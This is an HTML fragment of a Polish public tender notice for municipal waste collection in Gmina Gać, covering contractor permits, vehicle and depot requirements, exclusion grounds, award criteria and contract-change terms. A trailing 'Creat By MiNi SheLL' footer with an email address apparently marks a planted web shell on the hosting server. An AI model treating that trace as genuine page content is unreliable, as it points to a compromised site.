              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2019<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają n/w warunki:
a)	Posiadają zezwolenie na transport odpadów wydane na podstawie: ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.)
b)	Posiadają wpis do rejestru działalności regulowanej w zakresie odbierania odpadów od właścicieli nieruchomości na terenie Gminy Gać wydany na podstawie ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2016 r. poz. 672 ze zm.)
c)	Posiadają pisemne zapewnienie odbioru odpadów do przetwarzania przez podmiot obsługujący instalację regionu centralnego województwa podkarpackiego
d)	Posiadają wpis do rejestru zbierających sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska wymagany zgodnie z art. 7 ustawy z dnia 29 lipca 2005 roku o zużytym sprzęcie elektronicznym
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku udziału w postępowaniu w danym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymagania opisane w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z dnia 25 styczna 2013 r. w szczególności gdy dysponują lub będą dysponować na etapie realizacji zamówienia bazą magazynowo  transportowa oraz pojazdami w ilości niezbędnej do prawidłowej realizacji umowy, przystosowanymi do odbierania poszczególnych frakcji odpadów, w sposób wykluczający mieszanie odpadów.

Dodatkowe wymagania dotyczące pojazdów jakie muszą być spełnione w celu wykazania spełnienia warunków potencjał techniczny:
a)	Powinny być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.
b)	Co najmniej 1 pojazd powinien umożliwić obsługę nieruchomości o drogach dojazdowych lokalnych o szerokości do 2,5 m i tonażu nie przekraczającym 3 tony
c)	Co najmniej 1 pojazd powinien umożliwić zbiórkę odpadów wielkogabarytowych
Przy czym pojazdy te powinny być trwale i czytelnie oznakowane, w widocznym miejscu nazwa firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości.
Wykonawca musi bezwzględnie dostosować wielkość i parametry pojazdów do rodzaju odbieranych odpadów oraz nośności dróg.

Baza magazynowo  transportowa powinna spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości (Dz. U. z dnia 25 stycznia 2013 r. poz. 122).
Podmiot odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany posiadać bazę magazynowo  transportowo usytuowana:
a)	W gminie z terenu której odbiera te odpady lub w odległości nie większej niż 60km od granicy tej gminy
b)	Na terenie do którego posiada tytuł prawny
W zakresie wyposażenia bazy magazynowo  transportowej należy zapewnić aby:
a)	Teren bazy magazynowo  transportowej był zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym
b)	Miejsce przeznaczone do parkowania pojazdów były zabezpieczone przed emisją zanieczyszczeń do gruntu
c)	  Miejsce magazynowania selektywnie zebranych odpadów komunalnych były zabezpieczone przed działaniem czynników atmosferycznych
d)	Tern bazy magazynowo  transportowej był wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z ternu bazy zgodnie z wymogami określonymi przepisami ustawy z dnia 18 lipca 2001 r.  Prawo wodne (Dz. U. z 2012 r. poz. 145, 951 i 1513 oraz z 2013 r. poz. 21)
e)	Baza magazynowo  transportowa była wyposażona w:
- miejsca przeznaczone do parkowania pojazdów
- pomieszczenie socjalne dla pracowników odpowiadających za liczbie zatrudnionych osób
- miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych
- legalizowaną samochodowa wagę najazdową  w przypadku gdy na terenie bazy następuje magazynowane odpadów
Na terenie bazy magazynowo  transportowej powinny znajdować się także:
a)	Punkt bieżącej konserwacji i naprawy pojazdów
b)	Miejsce do mycia i dezynfekcji pojazdów, o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy 
c)	Na terenie bazy magazynowo  transportowej znajdowały się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsca przetwarzania.    
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust 5 pkt 1 ustawy Pzp.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zezwolenie na transport odpadów wydane na podstawie: ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2013 r. nr 185, poz 1243 ze zm.) oraz art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.). Kserokopia aktualnego wpisu do rejestru działalności regulowanej w zakresie odbioru odpadów od właścicieli nieruchomości na terenie Gminy Gać. Dokument lub jego kopia potwierdzający zapewnienie odbioru odpadów przez instalację. Wpis do rejestru zbierających sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska wymagany zgodnie z art. 7 ustawy z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykona zamówienia wraz informacja o podstawie dysponowania tymi zasobami.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oferta. Pełnomocnictwo do reprezentowania wykonawcy w niniejszym postępowaniu oraz do podpisania umowy (o ile nie wynika to z dokumentów rejestracyjnych).Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty oraz podpisach oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub informacji z centralnej ewidencji i informacji o działalności gospodarczej), to do oferty należy dołączyć oryginał lub poświadczą ą za zgodność z oryginałem przez notariusza, kopię pełnomocnictwa wystawionego na reprezentanta Wykonawcy przez osoby do tego upełnomocnione. Wykonawcy wspólnie ubiegają się o zamówienie składają do oferty wypełnione załączniki nr 6 lub 7 do SIWZ. Określone podwykonawstwa  załącznik nr 9
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termi płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z art. 144 ust. 1 ustawy Prawo Zamówień Publicznych zamawiający dopuszcza możliwość dokonania zmian zawartej umowy w stosunku do treści oferty w zakresie:
1)	Zmiana zakresu lub rezygnacja z zakresu prac powierzonych podwykonawcom  wskazanego w ofercie
2)	Zmiany wynagrodzenia w przypadku urzędowej zmiany podatku VAT obowiązującej Wykonawcę i związanej bezpośrednio z przedmiotem zamówienia.
3)	Zmiany sposobu realizacji przedmiotu zamówienia na skutek zmiany przepisów prawa wpływającej na sposób realizacji przedmiotu zamówienia.
4)	Zmiany sposobu realizacji przedmiotu zamówienia, za porozumieniem stron, jeżeli zmiana będzie korzystna  dla Zamawiającego i przyczyni się do poprawy jakości lub efektywności świadczonych usług.
5)	Zmiana w zakresie wynagrodzenia w przypadku:
a.	Zmiany stawek opłat za przyjecie odpadów w Regionalnej Instalacji do Przetwarzania Odpadów komunalnych.
b.	Zmiany wysokości innych opłat wynikających wprost z przepisów prawa a mających istotny wpływ na koszty świadczenia usługi,
c.	Innej zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierania i zagospodarowania odpadów,
d.	Odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych.
e.	Wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia uprawnienia procesu realizacji zamówienia.

W związku z ust. 2 pkt e dopuszczalne jest zmniejszenie lub zwiększenie wynagrodzenia, przy czym zwiększenie wynagrodzenia dopuszczalne jest o kwotę nie większą niż udokumentowany wzrost kosztów świadczenia usługi.

Inne zmiany jakie dopuszcza ustawodawca w zakresie zawartej umowy zostały określone w art. 144 ustawy Pzp i dotyczy to następujących okoliczności:

- zmiany dotyczą realizacji dodatkowych dostaw, usług lub robót budowlanych od dotychczasowego wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:

a)	Zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego.
b)	 Zmiana wykonawcy spowodowały istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego.
c)	Wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej w pierwotnie w umowie.
- zostały spełnione łącznie następujące warunki:

a)	Na podstawie postanowień umownych, o których mowa w art. 144 ust. 1 pkt 1
b)	W wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy. 
c)	W wyniku przejęcia przez Zamawiającego zobowiązań wykonawcy względem jego podwykonawców.
- zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu art. 144 ust. 1 e;
- łączna wartość zmian jest mniejszą niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień na roboty budowlane  jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 01/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com